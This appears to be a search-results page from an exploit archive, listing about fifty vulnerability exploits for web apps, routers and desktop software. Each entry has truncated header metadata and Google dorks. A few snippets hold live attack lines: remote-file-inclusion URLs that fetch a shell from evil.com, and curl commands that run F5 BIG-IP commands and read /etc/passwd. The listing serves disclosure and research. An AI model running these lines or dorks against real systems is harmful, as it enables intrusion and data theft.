47904 matches found
Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting
Exploit Title: Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting Date: 2020-07-07 Vendor Homepage: https://powie.de Vendor Changelog: https://wordpress.org/plugins/powies-whois/developers Software Link: https://wordpress.org/plugins/powies-whois/ Exploit Author:...
ASTPP VoIP 4.0.1 - Remote Code Execution
Exploit Title: ASTPP VoIP 4.0.1 - Remote Code Execution Date: 2019-11-18 Exploit Author: Fabien AUNAY Vendor Homepage: https://www.astppbilling.org/ Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1 Version: 4.0.1 vendor default setup script Tested on: Debian 9 - CentOS 7 CVE : - ASTPP...
Bullwark Momentum Series JAWS 1.0 - Directory Traversal
Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal Date: 2019-12-11 Author: Numan Türle Vendor Homepage: http://www.bullwark.net/ Version : Bullwark Momentum Series Web Server JAWS/1.0 Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 POC --------- GET...
eMerge50P 5000P 4.6.07 - Remote Code Execution
Exploit Title: eMerge50P 5000P 4.6.07 - Remote Code Execution Google Dork: NA Date: 2018-11-11 Exploit Author: LiquidWorm Vendor Homepage: http://linear-solutions.com/nscfamily/e3-series/ Software Link: http://linear-solutions.com/nscfamily/e3-series/ Version: 4.6.07 Tested on: NA CVE :...
Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass
We already reported four bugs in Android that are caused by the use of getpidcon, which is fundamentally unsafe: https://bugs.chromium.org/p/project-zero/issues/detail?id=727 AndroidID-27111481; unexploitable https://bugs.chromium.org/p/project-zero/issues/detail?id=851 AndroidID-29431260;...
WebKit JSC - reifyStaticProperty Needs to set the PropertyAttribute::CustomAccessor flag for CustomGetterSetter
/ https://github.com/WebKit/webkit/blob/3fff8c40c665a09de5e3ede46fc35908f69353c3/Source/JavaScriptCore/runtime/Lookup.hL392 if value.attributes & PropertyAttribute::PropertyCallback JSValue result = value.lazyPropertyCallbackvm, &thisObj; thisObj.putDirectvm, propertyName, result,...
XenForo 2 - CSS Loader Denial of Service
Exploit Title: XenForo CSS Loader DoS Google Dork: intext:"Forum software by XenForo™" inurl:css.php ext:php Date: 22-03-18 Exploit Author: LockedByte Vendor Homepage: https://xenforo.com/ Software Link: https://xenforo.com/help/installation/ Version: XenForo 2 Tested on: Linux...
Jax Guestbook 3.50 - Admin Login
Exploit Title: Jax Guestbook 3.50 Admin Login Exploit Date: December 23rd, 2009 Author: Sora Software Link: http://script.wareseeker.com/ASP-NET/jax-guestbook-3.50.zip/32956d53cf Version: 3.50 Tested on: Windows and Linux ------------------------------------------- Jax Guestbook 3.50 Admin Login...
PHP Blue Dragon CMS 2.9.1 - Cross-Site Scripting / SQL Injection Code Execution
!/usr/bin/php -q -d shortopentag=on ? $devilteam = " ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:...
FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion
NeXtMaN Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt? http://site.com/scriptpath/inc/cmses/aedatingCMS2.php?dirinc=http://evil.com/shell.txt?...
KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection
Exploit Title: KiviCare Clinic & Patient Management System EHR 3.6.4 - Unauthenticated SQL Injection SQL Injection Google Dork: inurl:"/wp-content/plugins/kivicare-clinic-management-system/ Date: 11/12/2024 Exploit Author: Samet "samogod" Gözet Vendor Homepage: wordpress.org Software Link:...
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
Exploit Title : ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.07.01 Summary: ASPECT is an award-winning scalable building energy...
Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting XSS Exploit Author: tmrswrr Vendor Homepage: https://decapcms.org/docs/intro/ Software Link: https://github.com/decaporg/decap-cms Version: 2.10.192 Tested on: https://cms-demo.netlify.com Description: 1. Go to new post and write...
Paradox Security Systems IPR512 - Denial Of Service
!/bin/bash Exploit Title: Paradox Security Systems IPR512 - Denial Of Service Google Dork: intitle:"ipr512 - login screen" Date: 09-APR-2023 Exploit Author: Giorgi Dograshvili Vendor Homepage: Paradox - Headquarters https://www.paradox.com/Products/default.asp?PID=423 Version: IPR512 CVE :...
Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Exploit Title: Control Web Panel 7 CWP7 v0.9.8.1147 - Remote Code Execution RCE // Date: 2023-02-02 // Exploit Author: Mayank Deshmukh // Vendor Homepage: https://centos-webpanel.com/ // Affected Versions: version 0.9.8.1147 // Tested on: Kali Linux // CVE : CVE-2022-44877 // Github POC:...
DLINK DAP-1620 A1 v1.01 - Directory Traversal
Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal Date: 27/4/2022 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://me.dlink.com/consumer Version: DAP-1620 - A1 v1.01 Tested on: Linux CVE : CVE-2021-46381 POST /apply.cgi HTTP/1.1 Content-Type:...
Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)
Exploit Title: Stock Management System 1.0 - 'userid' Blind SQL injection Authenticated Date: 11/06/2021 Exploit Author: Riadh Benlamine rbn0x00 Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip...
HelloWeb 2.0 - Arbitrary File Download
Exploit Title: HelloWeb 2.0 - Arbitrary File Download Date: 2020-07-09 Vendor Homepage: https://helloweb.co.kr/ Version: 2.0 Latest and previous versions Exploit Author: bRpsd Contact Author: cyatlive.no Google Dork: inurl:exec/file/download.asp Type: WebApps / ASP...
Reside Property Management 3.0 - 'profile' SQL Injection
Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection Date: 2020-06-28 Google Dork: "Copyright 2020 Reside Property Management" Exploit Author: Ultra Security Team Ashkan Moghaddas , AmirMohammad Safari Team Members: Behzad Khalifeh , Milad Ranjbar Vendor Homepage:...
qdPM 9.1 - Remote Code Execution
Exploit Title: qdPM 9.1 - Remote Code Execution Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net Date: 2020-01-22 Exploit Author: Rishal Dwivedi Loginsoft Vendor Homepage: http://qdpm.net/ Software Link: http://qdpm.net/download-qdpm-free-project-management Version: =1.9.1 Tested on:...
osTicket 1.12 - Persistent Cross-Site Scripting via File Upload
Exploit Title: osTicket-v1.12 Stored XSS via File Upload Vendor Homepage: https://osticket.com/ Software Link: https://osticket.com/download/ Exploit Author: Aishwarya Iyer Contact: https://twitter.com/aish9524 Website: https://about.me/aishiyer Category: webapps CVE: CVE-2019-14748 1. Descriptio...
Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/propertyagency/ Demo Site: https://www.phpscriptdemos.com/agency/ Version: 4.0 Tested on: Kali Linux CVE: N/A Description:PHP Real...
Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Firefox nsSMILTimeContainer::NotifyTimeChange RCE", 'Description' = %q This module exploits an out-of-bounds...
vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection
Exploit Title : vBulletin = 4.2.3 SQL Injection CVE-2016-6195 Author : Manish Kishan Tanwar AKA error1046 https://twitter.com/IndiShell1046 Date : 25/08/2015 Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi Tested At : Indishell Laboriginally develop...
HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)
$Id: hpnnmtoolbar.rb 9262 2010-05-09 17:45:00Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...
OpenPanel 0.3.4 - Directory Traversal
Exploit Title: OpenPanel 0.3.4 - Directory Traversal Date: Dec 05, 2024 Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee Vendor Homepage: https://openpanel.com/ Software Link: https://openpanel.com/ Version: 0.3.4 Tested on: macOS CVE : CVE-2024-53537 Compress Function POS...
Jasmin Ransomware - SQL Injection Login Bypass
Exploit Title: Jasmin Ransomware SQL Injection Login Bypass Google Dork: N/A Date: 05-03-2025 Exploit Author: Buğra Enis Dönmez Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware Software Link: https://github.com/codesiddhant/Jasmin-Ransomware Version: N/A Tested on: Windows How t...
Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI
Exploit Title: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI Date: 2022-10-14 Fix Date: 2020-05 Exploit Author: Kahvi-0 Github: https://github.com/Kahvi-0 Vendor Homepage: https://www.mitel.com/ Vendor Security Advisory:...
Moodle LMS 4.0 - Cross-Site Scripting (XSS)
Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting XSS Date: 26/10/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://moodle.org/ Software Link: https://git.in.moodle.com/moodle Version: 4.0 Tested on: XAMPP, Windows 10 Contact: https://twitter.com/dmaral3noz Description: A Cross Site...
Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection
Exploit Title: Translatepress Multilinugal WordPress plugin 2.3.3 - Authenticated SQL Injection Exploit Author: Elias Hohl Date: 2022-07-23 Vendor Homepage: https://translatepress.com/ Software Link: https://wordpress.org/plugins/translatepress-multilingual/ Version: 2.3.3 Tested on: Ubuntu 20.04...
AtomCMS v2.0 - SQLi
Exploit Title: AtomCMS v2.0 - SQLi Date: 08/02/2022 Exploit Author: Luca Cuzzolin aka czz78 Vendor Homepage: https://github.com/thedigicraft/Atom.CMS Version: v2.0 Category: Webapps Tested on: Debian linux CVE : CVE-2022-24223 ==================================================== PoC : SQLi :...
CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path
Exploit Title: CONTPAQi® AdminPAQ 14.0.0 - Unquoted Service Path Discovery by: Angel Canseco Discovery Date: 2022-01-16 Software Link: https://www.contpaqi.com/descargas Tested Version: 14.0.0 Vulnerability Type: Unquoted Service Path Tested on OS: Windows 10 pro x64 english Step to discover...
Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation
Exploit Title: Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation Google Dork: inurl:/wp-content/plugins/js-jobs/ Date: 22/09/2021 Exploit Author: spacehen Vendor Homepage: https://wordpress.org/plugins/js-jobs/ Version: spacehen www.github.com/spacehen" def...
Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: Filerun 2021.03.26 - Remote Code Execution RCE Authenticated Date: 09/21/2021 Exploit Author: syntegris information solutions GmbH Credits: Christian P. Vendor Homepage: https://filerun.com Software Link:...
Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
Exploit Title: Customer Relationship Management System CRM 1.0 - Sql Injection Authentication Bypass Date: 27/07/2021 Exploit Author: ShafiqueWasta Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html Software Link:...
Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)
Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass SQLi Date: 12.05.2021 Exploit Author: Mesut Cetin Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html Software Link:...
ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path
Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path Exploit Author : SamAlucard Exploit Date: 2021-03-21 Software Version : ActivIdentity 8.2 Vendor Homepage : https://www.hidglobal.com/ Tested on OS: Windows 7 Pro ActivIdentity was Acquired by HID Global in Octuber 2010...
WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion
Exploit Title: WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion Date: 24/07/2020 Exploit Author: Erik David Martin Vendor Homepage: https://supsystic.com/ Software Link: https://downloads.wordpress.org/plugin/backup-by-supsystic.zip Version: 2.3.9 Tested on: Ubuntu 16.04.6 LTS /...
10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow SEH Date: 2020-12-22 Exploit Author: Florian Gassner Vendor Homepage: https://www.10-strike.com/ Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe Version: 9.05 Tested on...
WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt Date: 2020-07-20 Exploit Author: KBA@SOGETIESEC Vendor Homepage: https://www.icegram.com/email-subscribers/ Softwar...
BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC)
RCE: curl -v -k 'https://F5 Host/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' Read File: curl -v -k 'https://F5 Host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'...
oXygen XML Editor 21.1.1 - XML External Entity Injection
Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection Author: Pablo Santiago Date: 2019-11-13 Vendor Homepage: https://www.oxygenxml.com/ Source:https://www.oxygenxml.com/xmleditor/downloadoxygenxmleditor.html Version: 21.1.1 CVE : N/A Tested on: Windows 7 PoC 1- python -m...
Neo Billing 3.5 - Persistent Cross-Site Scripting
Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability Date: 18.8.2019. Exploit Author: n1x MS-WEB Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547 Version: 3.5 CWE : CWE-79 CVE: CVE-2020-23518 Description Neo Billing os a...
elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'elFinder PHP Connector exiftran Command Injection', 'Description' = %q This module exploits a command injection vulnerability in elFinder version...
TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)
TestLink Open Source Test Management 1.9.16 - Remote Code Execution PoC. CVE-2018-7466. Remote exploit for Linux platform Title: TestLink Open Source Test Management= 1.9.16 Remote Code Execution By Manish error1046 Vendor Home Page: http://testlink.org Disovered At: Indishell Lab CVE ID:...
phpBB 2.0.x - 'album_portal.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/10177/info It has been reported that phpBB may be prone to a file include vulnerability that may allow remote attackers to include a remote malicious script to be executed on a vulnerable system...
Belkin F9K1009 F9K1010 2.00.04/2.00.09 - Hard Coded Credentials
/ Title : Belkin F9K1009 F9K1010 2.00.04/2.00.09 - Hard Coded Credentials Author : Byte Reaper CVE : CVE-2025-8730 Description : Exploit demonstrating an authentication bypass vulnerability in the web interface of Belkin F9K1009 and F9K1010 routers. The flaw resides in improper session validation...
OpenCMS 17.0 - Stored Cross Site Scripting (XSS)
Exploit Title: OpenCMS 17.0 - Stored Cross Site Scripting XSS Date: 24-11-2024 Exploit Author: Siddhartha Naik Vendor Homepage: http://www.opencms.org/en/ Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=dade528f-ec17-11ee-ab97-7fde8b0295e1 Affected Version: 17.0...
qBittorrent 5.0.1 - MITM RCE
Exploit Title: qBittorrent 5.0.1 MITM RCE Date: 01/02/2025 Exploit Author: Jordan Sharp Vendor Homepage: https://github.com/qbittorrent/qBittorrent Software Link: https://www.qbittorrent.org/download Version: 5.0.1 Tested on: Windows 10 CVE : CVE-2024-51774 Run the PoC on a MITM machine...
Sonatype Nexus Repository 3.53.0-01 - Path Traversal
Exploit Title: Sonatype Nexus Repository 3.53.0-01 - Path Traversal Google Dork: header="Server: Nexus/3.53.0-01 OSS" Date: 2024-09-22 Exploit Author: VeryLazyTech GitHub: https://github.com/verylazytech/CVE-2024-4956 Vendor Homepage: https://www.sonatype.com/nexus-repository Software Link:...